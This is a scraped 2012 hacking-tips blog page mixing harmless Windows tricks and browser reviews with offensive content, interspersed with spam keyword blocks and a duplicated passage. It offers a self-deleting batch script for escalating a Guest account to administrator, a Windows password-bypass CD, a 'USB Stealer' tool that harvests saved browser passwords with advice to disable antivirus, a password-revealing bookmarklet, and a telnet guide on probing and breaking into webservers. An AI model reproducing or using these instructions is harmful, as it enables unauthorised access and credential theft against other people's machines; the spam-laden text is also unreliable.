Recent Posts


Welcome To My Blog

Hello Guys,I am Bassel and I welcome you to my blog.

This Group is made for those People who want to learn more about computers

This blog provides you with free Tips and Tricks about Computer and teacher you how you could save yourself from hacking.

Knowledge is For Sharing.

Remember Guys...This Group doesn't encourage you to do hacking.Legally,Hacking is a Crime and a Hacker is a Criminal.Everything I teach You here is for Knowledge Pupose.

Solutions to your Problems

Anyone can ask Me about problems of their Computers and I'll Help you with that.

Follow Me Please!

If You like the Tricks and Posts in this blog you can Follow it too.

Friday, March 16, 2012

How To Bypass Login Password on Any Windows

hello hackers
this is one of my favorite cds,, u can hack win 7 win vista and win xp passwords with it
just download the .iso image and burn it to a cd :
DOWNLOAD LINK : BASSEL BLOG

How to Protect your BLOG or WEBSITE content

If u want to prevent others from copying content from ur website.. u just have to copy the script bellow and paste it in ur blogs template html :P
This script will disable the LEFT CLICK on Text Content :
1- Go to design, HTML
2- Look for " "

U can download THE SCRIPT HERE : BASSEL SCRIPT

Friday, March 9, 2012

My Youtube Channel : bassellebanon .. Please Subscribe !!

Some of my vids :








How to Write-Protect Your USB Flash Drive

USB Write ProtectMany a time, it becomes necessary for us to write protect our USB flash drive so as to protect it from viruses and other malware programs. Because flash drives are so popular and most widely used to move data between computers, they are the prime target for attackers as a means to get infections spread around the computer world. Also, since USB drive is not a Read-Only Memory (ROM), the data inside it can easily be modified or deleted by malware programs.

But unfortunately, most of the new flash drives do not come with a write-protect feature as the manufacturers wish to cut down the cost of production. Hence, the only way to write-protect your USB flash drives is to enable this feature on your own computer.

This can be done by adding a small entry to the Windows registry which acts as a switch that can be enabled to make use of the write protection or disabled to allow write access. Just follow these steps:

1. Open the Registry Editor (Open the “Run” dialog box, type regedit and hit “Enter”).

2. Navigate to the following Registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\

3. Create a New Key named as StorageDevicePolicies. To do this right-click on Control, and click on New->Key and name it as StorageDevicePolicies.

4. Now right-click on StorageDevicePolicies and create a New->DWORD (32-bit) Value and name it as WriteProtect.

Write-Protect USB Drive

5. Double-click on WriteProtect and set the Value data to 1.

Now the right-protection for USB drives is enabled on your computer (no restart required) and thus it would not be possible for anyone or any program to add/delete the contents from your USB flash drive. Any attempt to copy or download the files onto the USB drive will result in the following error message being displayed.

USB-Write Protect Error

To revert and remove the write-protection, all you need to do is just change the Value data for WriteProtect (Step-5) from 1 back to 0. Now write access to all the USB devices is re-enabled.

Sometimes it may seem difficult to remember and follow the above mentioned steps each time you want to enable/disable the write protection. Hence as an alternative way, there are many tools available to automatically enable/disable the write-protection feature. One of my favorite tool is USB Write Protect by Naresh Manadhar. Using this tool you can limit write access to your USB drives with just a click of a button. You can download this tool from the following link:

























xhamster, descargar ares, ares























games, descargar ares, ares

Post Blank in Facebook,Orkut,Twitter.

Written By Kanishk Singh :



Do you wanna learn how to Comment,Post blank on Facebook.? Then you must read this Doc.

While Posting,Commenting or Chatting,Press this key Combination--->

Press and hold ALT+0173. and Hit enter.
You'll Notice that after pressing enter there will be no word on the post/the post will be blank.

What is this code?


Your computer then substitutes a (normally) undisplayed soft hyphen, Unicode character U+00AD.
This is a common trick used on the internets for many purposes, such as bypassing wordfilters, to maintain forced anon by choice after
The Great Re/b/oot (the character would make the name display a blank name rather than "Anonymous"),
and to post using moot's tripcode without getting b&.


Special Credits To Kanishk Singh

View the password behind the Asterisk.

Written By Kanishk Singh :



To view saved passwords behind asterisk, just open the web page having the password.
After opening the web page paste the javascript given below in the address bar and hit enter.
That’s it.

JAVASCRIPT--->


javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j




Special Credits to Kanishk Singh
























hulu, descargar ares, ares























tube8, descargar ares, ares























xnxx, descargar ares, ares

Get 1000 Twitter Followers in a Day.

Written By Kanishk Singh :



Twitter lies amongst the top position in the list of the most admired and heavily used social networking site. A Twitter user always want his/her tweet to reach the the eyes of as many people as possible. This tricky technique can do the work for them:


get twitter followers

1). http://twittercounter.com/pages/100 is the URL where you will find the record of most followed twitters.

2). Target at least 10 such Twitters.

3). Open each of the profile in a separate tab and follow them one at a time.

4). Here comes the Tricky part, on following an individual your name will come at the top position in the catalog of followers. As a result, the person who follows that individual will also follow you as going after their followers will compel then to follow you.

5). Even if you quit to follow that individual after 5 minutes yet you succeeded in increasing your followers list within that 5 minutes span.

For the beginners, just by following these simple steps, you can surely make a good mark. Advertising today is solely a game in the industry, which results in the formula, the more the ads, the better sales you get. By increasing the twitter followers one may let other people read the updates that one has posted.



Special Credits To Kanishk Singh
























cool math games, descargar ares, ares























descargar ares gratis, descargar ares, ares























pornhub, descargar ares, ares























pornhub, descargar ares, ares

Make your Own Animation.

Written By Kanishk Singh :



Hello,
Here's a trick from which you can Make your own Animation.

For doing that you just need to download the File "Pivitor_StickFigure_Animation.rar" from my Mediafire Account.

Here's the link--->Download

Download and Enjoy.

Wanna see one Example? See here--->


HAPPY HACKING!


Special Credits To Kanishk Singh

Know the temperature of your Computer

Written By Kanishk Singh :



Hello,
Here's a trick from which you can know the temperature of your Laptop .{I don't know about desktops.}

For this you Just need to download the Software from my Mediafire Profile.

The Software is call SPEED FAN 445.

Here's the Link--->Download

File Size--->2MB.

Happy Hacking.

Special Credits To Kanishk Singh

USB Stealer.

Written By Kanishk Singh :


Note:I am Not Responsible for what thing you use this trick for.This is only for Educational Purpose.


Hello,

Now I am Going to Post on the topic USB Stealer.

What is a USB Stealer?

A USB Stealer is a Software which can Collect the Passwords Stored on a computer very easily.There are Two Main Types of USB Stealer.

1. Internet Browser Password Stealer.

2. Windows Administrator Password Stealer.

This Time we'll learn about Internet Browser Password Stealer.

This one can Tell you the passwords of any of the following Messengers and Internet Browsers-

1. Internet Explorer.

2. Google Chrome.

3. Opera Browser.

4. Outlook Mail.

5. Mozilla Firefox.

6. Hotmail Messenger.

To Download This Just Click Here.


Now Just Double Click on the .RAR file and Click on Extract Button. A dialogue box will open asking for password.Just type this is the password feild->

velocity

If It fails to Extract the file,then you need to Disable your Anti-Virus only for sometime(until you are done getting the password.)

If You don't know how to Disable your Anti-Virus,just Google it like

How to Disable your anti-virus.

Now Enjoy this Software for free!!



HAPPY HACKING!!!





Special Credits To Kanishk Singh

Trigger "God Mode" in Windows


The "God Mode" term on computer is a simple way that allows users to access all the hidden applications in Windows Control Panel from one folder only.

By creating a new folder in Windows 7 and changing the name by using the specified text string as the name of the extension at the back of the folder, we could have a way to change almost any setting, configuration, registry, and others. The changes is such as changing the look of the mouse pointer to create a new hard-drive partitions.

So, God Mode is creating a folder that contains all the access to hidden Windows Control Panel. This step is a practical way to access all the controls in the Windows configuration.

To Enable 'God Mode' in Windows 7
This trick is running on OS Windows 7, To enter the "GodMode" we need to create a new folder. Then rename the folder to:

Foldername.{ED7BA470-8E54-465E-825C-99712043E01C}
Or change the name to:
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

The folder icon will change to Control Panel icon and will contain dozens of Control options Access.






Special Credits To Kanishk Singh

Sea Monkey Browser 2.6.1 Free Download.




You Can Find the Download Link to Sea Monkey 2.6.1 at the end of this post.

While some internet browsers are for-profit applications backed by major corporations, the SeaMonkeybrowser suite is an open-source, community-driven project. This means any developers, marketers or testers interested in contributing to the development of the internet browser can do so. However, many of SeaMonkey’s inherent drawbacks are a result of its open-source platform, and the browser lacks the sleekness and ease of use the top internet browsers in our lineup possess.



The hallmark feature of SeaMonkey is the fact that it is an all-in-one internet suite. This means not only does it provide browsing capabilities, it also has an email client, built-in chat and a WYSIWYG (“what you see is what you get”) editor that helps you build simple, basic websites. Subsequently, SeaMonkey is a good default browser if you are seeking an all-inclusive internet suite that limits the number of individual applications you need to utilize.



We also liked that the browser supports most of the add-ons and extensions compatible with Mozilla’s Firefox; both internet browsers use the same rendering engine. SeaMonkey also offers beneficial features such as a password manager, customizable toolbars and the ability to restore sessions. The internet browser, however, doesn’t provide many of the more advanced features we looked for in web browsers. It doesn’t provide mouse gestures or voice interaction for multimodial browsing, nor does it have a native RSS feeder or the ability to save bookmarks.



Since SeaMonkey is built on Mozilla’s source code, the internet browser also benefits from most of Mozilla’s security functions. The internet browser safeguards against most online threats including viruses, rootkits and fraudulent phishing websites. You can also download new security updates directly from the SeaMonkey website.


When it comes to ease of use, SeaMonkey is easy to install and its features are easy to access and utilize. With that said, the SeaMonkey interface feels clunky and outdated, reminiscent of a very early version of Firefox. Its lack of polish doesn’t hamper usability but it does make the internet browser feel archaic and obsolete, especially compared to the other internet browsers we reviewed.



One area we were surprised to find SeaMonkey perform below our expectations was in speed. The internet browser uses the same source code as Firefox but it surprisingly slower. In our time trials, it took SeaMonkey nearly six seconds to first initialize, with an average startup time of five seconds. The web browser’s navigation speed from one page to another was slightly faster, at about four seconds. The difference in speed between SeaMonkey and our top-ranked internet browsers is just a few seconds but in terms of browsing speed, that difference can be significant.



SeaMonkey provides very few support options for users. As an open-source platform, the browser relies heavily on community users to provide support. The user forums prove to be a good resource, where you can ask questions and find relevant information to your inquiry.

Summary
SeaMonkey is a good, but far from great, internet browser. Its features are practical, albeit basic, and it provides protection from dangerous internet threats. Many users will also find its all-in-one functionality convenient. However, SeaMonkey desperately needs a facelift and improved browsing speeds in order to compete with the more widely used internet browsers on the market.




Download Link for Sea Monkey 2.6.1 (Official Site)--->

Click Here To Download.


Opera 11.61 Browser Free Download.






You Can Get the Download Link for Opera 11.61 at the End of this Post.
REVIEW

The second-oldest browser currently in use, Opera debuted way back in 1995 and has recently undergone a major overhaul. No longer the quirky choice of enthusiasts, Opera has developed into a robust, full-featured suite of browsing tools.
Opera covers the basics with tabbed browsing, mouse-over previews, a customizable search bar, advanced bookmarking tools, and simple integration with e-mail and chat clients. Mouse-gesture support, keyboard shortcuts, and drag-and-drop functionality round out the essentials.

Installation
Installing Opera is a fast and short process, taking less than two minutes. Many of Opera's built-in features require creating a MyOpera account, but the browser will only prompt you to do so when you use them for the first time--it's not required to browse.
Tap the "Options" button on the first install screen to reveal configuration tweaks. Besides changing the browser's default language and install path, you can also install for just the currently-signed on user, or choose to install Opera directly to an external device. It's a great, simple way to create a portable version of Opera for a USB key.


Interface
Opera's interface keeps the same look that debuted in Opera 10.50, with a condensed menu button in the upper left corner, tabs on top, and a translucent status bar on the bottom that hosts buttons to reveal Opera's Panels, and to activate Link, Unite, and Turbo. The bottom right corner of the status bar sports a dedicated zoom button.


Source- Cnet.com




Download OPERA 11.61 From the Official Site-

Click Here


Make a Recycle Bin in your USB Pendrive.

Written By Kanishk Singh :


Hello, Here is a Trick that I am posting today "Make a Recycle Bin in your USB Pendrive." Yes,its possible.

After Learning this Trick you are sure to have a Recycle Bin in your USB Drive.

Why do I need a Recycle Bin in my USB Drive?


While working on another computer and using your own Flash Drive as a place to store and copy files, if a file is deleted it's sent to the Windows Recycle Bin or Permanently Deleted. If you'd like the extra security and peace of mind, use the iBin utility to have all deleted files sent to a Recycle Bin folder on the Flash Drive.


Just Follow the Below Steps to make a Recycle Bin on your USB Drive.

1. Download the iBin From Here.


Here is what the Software Would Look Like on Opening.


I advise you to Read the Disclaimer.txt and User Guide carefully before Using this Software.




Note: If you're installing this utility on a Flash Drive with several thousand files or a drive with several GB of data it may take a few minutes to index the drive and its contents the first time it is ran.

I Hope You Like this Software.


Special Credits To Kanishk Singh

How To Hack Windows Administrator Account From Guest Windows Account.

Written By Kanishk Singh :




Hello,Today I am giving a Trick on "How To Hack Windows Administrator Account from Guest Account."

To Do This Just Follow the below given Steps.

Do this from Guest Account.

1. Copy the below code.


Code--->


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0



2. Open Notepad and Save it as Guest2admin.bat ( You can keep any name the it should end with .bat Format) and keep the FILE TYPE as ALL FILES.


3. Execute this File where you Saved it.

A Command Prompt Window will Open and Close...And then,You'll come to the Administrator Account.

HAPPY HACKING!!!


Special Credits To Kanishk Singh

How to make a INVISIBLE folder.

Written By Kanishk Singh :

Earlier I have told you how to make a folder with no name.

Now I am going to teach you how to make a Invisible Folder

. For those who don't know how to make a folder with no name,they can refer to that note.

1)Right Click that Folder>Go to Properties.

2)Go to Custumize and select Change Icon.

3)Search for an Icon you don't see.
That means You will see empty spaces in between.(according to me some 3 or 4). Select that Icon and Apply the settings.

This is a cool trick.

GO ENJOY.!!!

Special Credits To Kanishk Singh

Thursday, March 1, 2012

Telnet: the Number One Hacker Tool


In this Guide you will learn:

· What is telnet?

· How to telnet

· How to get telnet accounts

· Why you might not want to telnet

· How to install a telnet server on your home Windows computer

· How to turn off a telnet server on your home Linux computer

· How to explore computers using telnet

· Why not use a portscanner instead?

· How to break into web sites using telnet

"Where do I type that command?" People ask that all the time when they read my early Guides to (mostly) Harmless Hacking. I wrote those guides back when the Internet was in its infancy and almost everyone in cyberspace used telnet. However, nowadays you might never even hear about telnet, much less use it, unless you are a hacker. So if you are still wondering about telnet, today is your lucky day.

What Is Telnet?

Telnet is a protocol that is most commonly used to log into a remote computer. It also is the single most powerful hacking tool on the planet. With just a telnet client program, you can:

· send email

· download source code from web sites

· send unexpected input to webservers that can give you amazing and sometimes illegal results

· give arbitrary input to many other services on Internet host computers

· probe the services offered by servers, routers and even people's home computers.

How to Telnet

Don't know how to telnet? Click the easy telnet links at happyhacker.com and land in the middle of a real hacker wargame! This should work regardless of your computer operating system -- if you have an up to date browser, if your online service provider gives you a true Internet connection, and if your computer is able to telnet at all.

Did those links get you into a telnet session? Were you able to login to a remote computer? If yes, congratulations.

If not, how can you fix the problem? If no telnet program appeared on your monitor when you clicked these links, perhaps your browser is too ancient to allow telnet. Try installing the latest Netscape browser (). Or, perhaps your operating system does not include a telnet program. In that case, install or reinstall Windows 95 or 98. If you own a Mac, get the superb Mac OS X or Linux PPC ().

If a telnet program came up and failed to connect, possibly the computer you were trying to telnet into was down or just plain no longer in existence. Or, you may be using America Online (or a similar extremely poor online service). If so, your simplest solution may be to get a better online service provider. Determined to hack using AOL? See http://happyhacker.org/aol.shtml <../aol.shtml> for some ways to make AOL give you a true Internet connection.

OK, so you've managed to telnet for the first time. Presumably you don't want to limit yourself to telnet links on web sites. How do you telnet anywhere you want to go?

If you have Linux or any other type of Unix (BSD, SCO, Solaris, Sun OS, Irix, Ultrix, etc.) telneting is easy. Just bring up "console" or "shell" (or whatever your GUI calls the command line interface). At the prompt type:

telnet

More on Telnet: the Number One Hacker Tool

Windows 2000 works pretty much like Unix. See Figure 1 for an example of a Win 2000 telnet login. Not shown on the screen was the command "telnet 10.0.0.10", which I gave at the Command (MS-DOS) prompt.

Figure 1: Telnet using Windows 2000

If you have Windows 95, 98 or NT, to telnet, bring up the MS-DOS prompt (Start --> Programs --> MS-DOS).

Click "connect" then "remote system…". In the host name box place the host name or IP address of the computer to which you wish to telnet. Leave the Port and Term Type boxes alone for now.

Here is a really important point. Every day people email me complaining that some computer won't let them telnet into it. They ask what they are doing wrong. They aren't doing anything wrong:

· Maybe the computer they are trying to reach no longer exists.

· Maybe the computer they are trying to reach doesn't allow telnet logins. For example, whois.internic.net no longer allows telnet logins on port 23 (the default port). Click here to learn how to telnet into whois.internic.net on the right port for that particular server. <../whois.shtml>

· Maybe a firewall is blocking them.

· Or maybe they make a telnet connection and the remote computer asks for a user name and password they don't have. Then they email me asking for how to get a login name and password that will work.

Newbie note: The owners or administrators of any Internet host computer decide who gets user names and passwords. Believe it or not, about once a week someone emails me asking what user name and password their own online service provider has assigned them for a telnet login. That's why I'm telling people the obvious -- if you want to telnet into any computer, and you don't have a user name and password, you must ask the owner, administrator of tech support for that system for a user name and password. If they won't give that to you, they don't want you to have it!

You can go to jail warning: If you guess the user name and password, or use a computer breakin technique to get or create them, or if someone other than an owner or administrator or a legitimate user on that system gives you a user name and password, it is against the law to use them. Many computer criminals give out user names and passwords that they obtained illegally.

More on Telnet: the Number One Hacker Tool

How to Get Telnet Accounts

OK, so you want to get legal user names and passwords so you can telnet into other computers. Here are some of the best ways:

· See http://happyhacker.org/links2.shtml#shells <../links2.shtml> for organizations that will give you free shell accounts. You can telnet into these.

· Ask Internet Service Providers for shell accounts. Some offer them, although most don't.

· Set up a telnet server on your own computer (see instructions below). Yes, once you are running a telnet server, you can telnet from your computer back into your computer. Simply give the command "telnet 127.0.0.1".

· Make friends with people who run Internet computers with telnet servers.

Why you May Not Want to Telnet

If you love your shell account server, don't ever, ever telnet or ftp into it. I recommend Ssh or Openssh for logging into remote computers? The telnet (and ftp) protocol is a "clear text" transmission. That means that computer on the same LAN as either You or your destination computer, or any computer on any LAN or network path through which your connection passes can steal your login name, password or anything else that goes across your connection. Ssh and OpenSsh encrypt all communications so no one can snoop on you.

How to Install a Telnet Server on your Windows Computer

Usually you can't telnet into a Windows home computer. The reason is, they aren't running telnet servers. Here's how to get a telnet server on your home Windows computers so your friends and you can telnet in and play.

For Windows NT, the Options Pack includes a primitive telnet server.

For Windows 95/98/NT and 2000, you also can install shareware or commercial telnet servers. Check out http://www.winfiles.com, or do a web search.

Of course installing a telnet server makes your computer vulnerable to all sorts of trouble from hackers. It's your funeral, don't come crying top me if a telnet visitor destroys your computer

More on Telnet: the Number One Hacker Tool

How to Turn off a Telnet Server on your Unix-type Computer

If you go online with Linux or other Unix-type computer, a telnet server is the easiest way to ensure you get destroyed by a malicious hacker. Here's how to prevent this. On most of these, the file /etc/inetd.conf launches most of your servers. Edit the file to put a "#" in front of the line that has telnet in it and either reboot your computer or kill and restart inetd.

If your computer doesn't use inetd to launch services, you should be able to find telnetd under /etc/init.d.

Install ssh instead and only use that to log into your shell account.

How to Explore Computers Using Telnet

Even if a computer doesn't have a telnet server, there are lots of fun and even legal things to do to it using telnet. The easiest thing to do is extract "banners" from a victim computer. A banner is a message a computer will often give when you telnet to a port that is running an Internet server of some sort.

For example, most mail sending servers use port 25. To telnet to port 25 from Win 2000 or a Unix shell, simply type:

telnet 25

Windows 95, 98 and NT make it a tiny bit harder.

More on Telnet: the Number One Hacker Tool

If the victim computer is running a mail server, you will see something that looks like this:

Whoa, look at that! The victim computer told us what operating system (Windows NT) and mail server (Mercur) it runs!

A quick search of the Bugtraq archives at revealed horrid things a criminal could do to that Mercur mail server. Since I think it is more fun to be nice, I told someone at the company using this mail server about the problems. He invited me to vacation at his beautiful Swiss home, where he and his wife keep horses and take long trail rides in the Alps. Golly, that is much more fun than breaking into a computer!

Right about now some elite ueberhaxorz are probably reading this and saying "What a lamer Meinel is! We can do the same thing by running nmap."

They are right, you can learn the same things by running a port scanning program such as nmap (available at ). However, I am quite careful about under what circumstances I run any port scanner. In order to get information on what programs are running on what ports, you must run a port scanner in a mode that will probably convince the owner of the victim computer that you are a criminal. He or she may persuade your online service provider to cancel your account.

The other reason to analyze computers using telnet is that you learn more. It's the difference between eating at McDonalds and learning how to cook.

More on Telnet: the Number One Hacker Tool

A quick search of the Bugtraq archives at revealed horrid things a criminal could do to that Mercur mail server. Since I think it is more fun to be nice, I told someone at the company using this mail server about the problems. He invited me to vacation at his beautiful Swiss home, where he and his wife keep horses and take long trail rides in the Alps. Golly, that is much more fun than breaking into a computer!

Right about now some elite ueberhaxorz are probably reading this and saying "What a lamer Meinel is! We can do the same thing by running nmap."

They are right, you can learn the same things by running a port scanning program such as nmap (available at ). However, I am quite careful about under what circumstances I run any port scanner. In order to get information on what programs are running on what ports, you must run a port scanner in a mode that will probably convince the owner of the victim computer that you are a criminal. He or she may persuade your online service provider to cancel your account.

The other reason to analyze computers using telnet is that you learn more. It's the difference between eating at McDonalds and learning how to cook.

How to Break into Web Sites Using Telnet

You don't have to use a web browser to access files on a web site. All you need to do is:

telnet 80

Or specify port 80 in a Windows telnet.

If you are using Windows 95/98/NT, whenever you are NOT logging into a telnet account, you should enable local echo. Otherwise whatever you type in (unless you are in a telnet account) will not show on the screen. To enable local echo, click Terminal --> Preferences --> Local Echo.

So how do you send stuff back to the webserver? Try this:

GET / HTTP/1.0

What kinds of commands can you send? The book Hackproofing Your Network <../bookstore/general.shtml> (by Ryan Russell of Securityfocus.com and Stance Cunningham) suggests a fun and harmless hack. Create and store a bogus cookie in the location on your web browser that stores cookies. (Find it by searching for the file "cookies.txt".) Name your bogus cookie something like "MyBogusCookie." Then telnet to the victim webserver and give something like this command:

GET / HTTP/1.0
User-Agent: HaveABogusCookieThisIsAJoke 123.4
Cookie: /; MyBogusCookie

The Überhacker! -- How to Break into Computers <../uberhacker/index.shtml> book details a number of serious attacks you can perform through sending funny input to a webserver. Basically, you need to learn how to write shell programs, and then find ways to get them to be run by the webserver. I'm not going to explain them here, however. These attacks, when carried out against a vulnerable webserver, are so easy that little kids could do them, and I don't want to be responsible for their behavior. It's much harder for little kids to get a hold of Russell's and my books than it is for them to read this GTMHH on the Happy Hacker website.

So are you dying to know what to send a webserver in order to break into it, without having to buy a book? Here are some hints. How to do this will depend on what webserver it is, what operating system it runs on, whether its security weaknesses have been fixed, and whether the web designer has used things such as Common Gateway Interface (CGI) or Server Side Includes (SSIs) that have weaknesses in them.

You will have to research these issues at Web sites that archive vulnerabilities and exploits such as and . You will need to study web site programming (HTML -- hypertext markup language, CGI and SSIs) and shell programming. You will need to learn webserver commands (documented at ). You will have to use your brain and be persistent.

But at least if you come across a telnet exploit, now you know the answer to the question "where do I type that command?"

























frostwire, descargar ares, ares

 
Twitter Bird Gadget